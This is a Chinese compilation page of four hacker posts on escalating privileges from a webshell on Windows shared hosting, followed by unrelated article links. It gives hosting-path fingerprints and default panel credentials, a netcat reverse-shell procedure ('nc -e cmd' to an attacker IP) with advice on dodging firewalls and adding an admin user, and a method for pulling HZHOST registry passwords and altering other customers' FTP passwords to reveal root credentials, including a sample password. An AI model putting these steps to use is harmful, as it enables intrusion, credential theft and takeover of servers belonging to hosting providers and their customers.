以下是小编精心整理的虚拟主机提权简单总结,本文共4篇,仅供参考,希望能够帮助到大家。本文原稿由网友“a310384”提供。
篇1:虚拟主机提权简单总结
我们的分享和交流只是为了能让自己进步一点点,能带给基友们一点点帮助,可是在交流的过程中遇见了能提权的shell被人删除的情况,真想不通陌生的基友你为什么要这样自私呢,做个黑产拿几百个shell回去卖,你能富有吗?
第一:了解一些简单的虚拟主机识别
常见的虚拟主机识别:
星外虚拟主机主机D:\\freehost\\zhoudeyang\\web\\Prim@Hosting 一般很难找到可执行目录,可以测试用远程调用cmd,exp来提权
虚拟主机D:\\hosting\\wwwroot\\ vhostroot
分支D:\\Vhost\\WebRoot\\51dancecn\\ vhostrootD:\\vhostroot\\localuser\\
星外分支D:\\vhostroot\\LocalUser\\gdrt\\
新网虚拟主机D:\\virtualhost\\web580651\\www\\ 可以找到很多可执行目录,但是目前基本上大部分为windows 系统,提权有难度
华众虚拟主机E:\\wwwroot\\longzhihu\\wwwroot\\ 一般有安全模式
星外分支F:\\host\\wz8088\\web\\
万网虚拟主机F:\\usr\\fw04408\\xpinfo\\ 支持aspx的话应该能扫到可执行目录
其他的虚拟主机可以使用reg.aspx,getacl.aspx配合来识别
第二:是不是能找到可执行目录
主要asp.php和aspx的,我在这里主要介绍ASPX的:
Reg.aspx从注册表读取目录
Getacl.aspx遍历目录以及文件,获取当前用户可控制的目录或者文件
篇2:关于plesk虚拟主机提权
这款虚拟机在国外比较流行,安全性能也很高,在这里记录下提权方法。
1.mysql的admin(原root)默认密码(setup)没改,通过mysql提权
2.Parallels Plesk Control Panel,在8880端口,默认用户名密码admin:setup
3.有注入点的情况下,db权限下写文件到启动项
篇3:NC反弹CMDSHELL提权总结
Server-U等都不可以用的情况下. 一般都可思考用此方法
不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口… 那么这种方法也失效了….
1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)
web目录都是有写有读的权限,我们直接传NC进去
2:然后本地执行nc -vv -lp 52进行反弹
3:在shell命令下执行
F:\\wwwroot\\img\\nc.exe -e cmd上传路径 IP(外网IP) 52(这里是本机端口)
4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.
5:直接添加用户,然后远程去连接!
看到添加成功,也设置为管理组了!接下来直接远程连接就OK!
不少人NC提权没有成功过,因为其中的原因是你没有降低权限,而导致了NC提权失败
失败总结:
1.反弹端口
网上不少文章写 反弹端口445 110 什么的,你当防火墙白痴是不是,我建议看一下端口有没有8080端口,如果没有8080端口的话,要反弹8080
端口,这样被防火墙阻止的概率较小
2.降低运行权限
1.现在本地监听一个端口
nc -vv -l -p 8080 //最好是80或8080这样的端口,被防火墙拦截的几率很小,
NC反弹CMDSHELL提权总结
,
2.在WebShell运行下面命令连接我们监听的端口得到CmdShell:
nc -vv IP 8080 -e C:\\Documents and Settings\\All Users\\Documents\\cmd.exe //假设cmd.exe是上传在“C:\\Documents and Settings\\All
Users\\Documents\\”这个目录
篇4:HZHOST虚拟主机在提权中的进一步利用网站安全
1,c:\\windows\\temp下有hzhost主机留下的ftp登陆记录。有用户名和密码
2。是利用hzhost拿系统主机最高权限的。
安装了hzhost的主机,其mssql sa密码,mysql root密码还有serv-u的administrator密码全部保存在注册表中。位置在
HKEY_LOCAL_MACHINE\\software\\hzhost\\config\\settings\\mysqlpass
HKEY_LOCAL_MACHINE\\software\\hzhost\\config\\settings\\mastersvrpass
经过了hzhost自己的加密方式,象eLVClO4tzsKBf#dee52443a3872cc159
这样的字符串。不过在hzhost后台可以还原!拿到了sa密码,或者root密码,最高权限就在眼前!禁止了w.s的话。大家就传aspx木马导撒!
我们传了一个asp木马上去后。在incs\\constr.asp下面可以看到数据库连接串,
然后连接到数据库。通过执行
SELECT * FROM [hstlst]语句。可以看到很多主机记录
h_ftppass的密码和hzhost主机自己的加密串很相似。没错,主机管理的密码也是经过他自己的加密方式加了密!而我们在主机管理的地方
看到明文密码。说明他又给还原回来了。明白了么?我们先通过aspx木马导出mysql,mssql的root,sa密码加密串后
我们通过这条语句,修改别人的主机密码。
UPDATE [hstlst] SET h_ftppss=’aPWw3j4zMaK83lHMBof9fc298b1d3d0a’ WHERE h_ID=10000471
然后回过头去看主机密码。(这时候被转成了明文)
拿到了root密码为:sphil_070921注意:由于有多种限制。我截的图可能不是很完美。但是此方法绝对可行!
- 相邻权纠纷答辩状2025-05-08
- 军训简单总结400字左右2022-12-11
- 实习水手工作简单总结2022-12-29
- 仓储业务月度总结简单2025-01-29
- 简单总结小学教师的工作职责2025-09-08
- 提建议的初中英语作文2025-06-18
- 提水壶作文100字2025-09-19
- 订立专利申请权注意事项与合同范本2022-12-11
- 信息网络传播权保护条例2022-12-22
- 权健会场主持人开场白2023-05-01